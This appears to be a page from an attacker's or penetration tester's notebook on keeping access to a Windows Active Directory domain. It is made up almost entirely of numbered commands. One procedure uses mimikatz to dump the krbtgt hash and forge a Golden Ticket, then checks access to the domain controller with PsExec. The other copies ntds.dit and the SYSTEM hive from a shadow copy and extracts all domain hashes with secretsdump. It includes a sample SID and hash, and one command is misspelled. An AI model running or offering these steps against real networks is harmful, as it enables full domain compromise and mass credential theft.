Persistence

Golden Tickets

1

Run mimikatz.exe on DC

C:\Tools\mimikatz.exe
2

Enable SeDebugPrivilege

privilege::debug
3

Dump NTLM hash

lsadump::lsa /patch
4

Retreive Domain SID and krbtgt NTLM Hash

EXAMPLE:

Domain : CORP / S-1-5-21-1987370270-658905905-1781884369

RID : 000001f6 (502) User : krbtgt LM : NTLM : 1693c6cefafffc7af11ef34d1c788f47

5

Run mimikatz.exe on Domain Machine

C:\Tools\mimikatz.exe
6

Enable SeDebugPrivilege

privilege::debuge
7

Delete all Kerberos tickets

kerberos::purge
8

Craft Golden Ticket

kerberos::golden /user:<Username> /domain:<Domain Name> /sid:<Domain SID> /krbtgt:<krbtgt NTLM Hash> /ptt
9

Launch new command prompt

misc::cmd
10

Check if can access DC

C:\Tools\SysinternalsSuite\PsExec.exe \\<Domain Controll Hostname> cmd

Shadow Copies

1

Run the following in elevated command prompt

C:\Tools\vshadow.exe -nw -p C:
2

Copy the database into C:\ Drive

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\ntds.dit.bak
3

Copy system hive into C:\ Drive

reg.exe save hklm\system C:\system.bak
4

Send the file to Kali

5

Obtain the hashes

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
PreviousLateral Movement

Last updated